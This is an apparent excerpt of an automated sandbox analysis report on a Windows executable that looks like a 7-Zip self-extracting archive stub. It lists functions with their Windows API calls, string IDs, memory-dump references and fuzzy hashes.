                                                                                            • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                                            • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                                            • API String ID: 2639302590-365843014
                                                                                            • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                                            • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                                                                            • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                                            • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                                                                            Function 00407776 Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                            • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                            • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                            • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                            • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                            • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                            • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                            • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 829399097-0
                                                                                            • Opcode ID: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                                                                            • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                                                                            • Opcode Fuzzy Hash: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                                                                            • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                                                                            Function 00402B79 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                                                                            • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                                                                            • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                                                                            • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                                                                            • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                                            • String ID:
                                                                                            • API String ID: 1862581289-0
                                                                                            • Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                                            • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                                                                            • Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                                            • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                                                                            Function 00406D5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                                                                            • GetWindow.USER32(?,00000005), ref: 00406D8F
                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$AddressLibraryLoadProc
                                                                                            • String ID: SetWindowTheme$\EA$uxtheme
                                                                                            • API String ID: 324724604-1613512829
                                                                                            • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                                            • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                                                                            • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                                            • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                                                                            Function 0041022D Relevance: .5, Instructions: 501COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                                            • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                                                                                            • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                                            • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                                                                                            Function 0041206B Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                                            • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                                                                                            • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                                            • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                                                                                            Function 00411F91 Relevance: .1, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                            • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                                                                                            • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                                            • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                                                                            Function 0040D72E Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                                            • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                                                                            • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                                            • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                                                                                            Function 00404AFF Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                                                                            • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                                                                                            • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                                                                            • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                                            • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                                            • API String ID: 3007203151-3467708659
                                                                                            • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                                            • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                                                                            • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                                            • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                                                                            Function 00404603 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 207stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                              • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                                              • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                                              • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                              • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                                              • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                              • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                              • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                              • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                              • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                              • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                            • _wtol.MSVCRT ref: 004047DC
                                                                                            • _wtol.MSVCRT ref: 004047F8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                                            • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                                                                            • API String ID: 2725485552-3187639848
                                                                                            • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                                            • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                                                                            • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                                            • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                                                                            Function 00402DC0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                                                                            • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                                                                              • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                              • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                              • Part of subcall function 00401A85: CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                              • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                                                                            • GetParent.USER32(?), ref: 00402E2E
                                                                                            • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                                                                            • GetMenu.USER32(?), ref: 00402E55
                                                                                            • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                                                                            • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                                                                            • DestroyWindow.USER32(?), ref: 00402EA3
                                                                                            • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                                                                            • GetSysColor.USER32(0000000F), ref: 00402EBC
                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                                                                            • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                                            • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                                            • API String ID: 1731037045-2281146334
                                                                                            • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                                            • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                                                                            • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                                            • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                                                                            Function 00401CC8 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                                            • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                                            • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                                            • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                                            • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                                            • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                                            • DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                                            • DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                                                                            • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3462224810-0
